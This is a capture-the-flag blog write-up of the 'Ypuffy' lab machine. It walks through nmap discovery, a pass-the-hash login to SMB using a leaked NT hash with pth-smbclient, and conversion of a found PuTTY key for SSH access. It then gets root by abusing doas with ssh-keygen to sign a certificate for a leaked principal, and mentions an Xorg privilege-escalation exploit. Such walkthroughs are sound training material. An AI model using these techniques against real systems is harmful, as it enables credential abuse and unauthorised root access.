Ypuffy - WriteUp


Let’s start with nmap. But let’s spice it up a bit with an additional script:

nmap -sC -sV -oN initial --script discovery

The output is quite big. You can the output here.

The script tries to get as much information as possible of your target and in this case shows some LDAP information and the following open ports:

Open Ports
22, 80, 139, 389, 445



The sambaNTPassword Hash immediately caught my attention.

sambaNTPassword: 0B186E661BBDBDCF6047784DE8B9FD8B


As this is very juicy information. I paused my enumeration and tried to exploit this. But how?

Password hashes are often used as a substitude to passwords. Which means, you don’t need the original password to authenticate to a service. Just the hash. This is how your corporate single-sign-on stuff works. Otherwise you would have to login every time. So it’s a convenience thing.

The method is called Pass-The-Hash. And of cause there are tools out there, that help you with this. Like: pth-smbclient. If you don’t have it, just got to github and get the pth-toolkit.



After fiddeling around with the options, syntax and where to connect to I managed to connect to alice share:

pth-smbclient --user=alice1978 --pw-nt-hash -m smb3 \\\\\\alice 0B186E661BBDBDCF6047784DE8B9FD8B

And we find a private key in “ppk” format.


After downloading the file, and trying to use it as a key to access ssh I got an error. This format is not compatible with ssh. So, I tried converting it. A quick googlesearch helped me finding the correct command for this task. But first we need to install putty-tools.

puttygen my_private_key.ppk -O private-openssh -o id_rsa
mv ~/.ssh
chmod 600 id_rsa
ssh -i id_rsa alice1978@


User Flag

As you can see in the screenshot. A simple ls gives us the “user.txt”.



Interal Recon

A quick uname -a reveals a BSD box. Which was quite handy. Shortly after this box was released an exploit for the XORG component of most BSD boxes was published. It’s local privesc which gives you root access. This is something you only get by googleing or being up-to-date with infosec news. This was the route I took to root the box.

However the intended method was a bit more tricky. While searching the directory structure I noticed a folder “userca”.
“CA” in this context mostly means “Certificate Authority” and is there to sign certificates or issue new keys. Let’s say: “ssh”.

Furthermore BSD has something like sudo, called doas. Let’s check what we can do on this box.

ypuffy$ cat /etc/doas.conf
keepenv :wheel
permit nopass alice1978 as userca cmd /usr/bin/ssh-keygen

We indeed can run ssh-keygen. But when we try, we are prompted for a password. Let’s dig deeper in the ssh route. There’s a password somewhere for sure.

ypuffy$ cat sshd_config
AuthorizedPrincipalsCommand /usr/local/bin/curl

So, apparently we can issue a curl to the “CA”…I guess, not sure what happens here. I still need to look this up…


Privilege Escalation

Let’s step back and catch up with the XORG exploit first. The exploit is fairly easy to use. Just get it from Exploit-db. It’s very easy to use.

  • Download
  • chmod +x
  • run
  • root

Let’s get back to the curl command and check what we can do with it:

ypuffy$ /usr/local/bin/curl ""

For whatever reason we get this string back: 3m3rgencyB4ckd00r - obviously the missing password. Let’s create a key and try signing it.

ypuffy$ ssh-keygen -t rsa
ypuffy$ mv id_rsa.pub /tmp
ypuffy$ doas -u userca /usr/bin/ssh-keygen -s /home/userca/ca -n 3m3rgencyB4ckd00r -I "algo" -z 1 id_rsa.pub
  Signed user key id_rsa-cert.pub: id "algo" serial 1 for 3m3rgencyB4ckd00r valid forever
ypuffy$ cp id_rsa-cert.pub /home/alice1978/.ssh/

This seems to work so far. But can we login now?


Root Flag

ypuffy$ ssh root@localhost
OpenBSD 6.3 (GENERIC) #100: Sat Mar 24 14:17:45 MDT 2018
ypuffy# id
uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)
ypuffy# ls

This is it. We got the box. =)

See ya next time!



Previous Post Next Post Home
x41 avatar
IT-Security analyst by day. InfoSec enthusiast at night.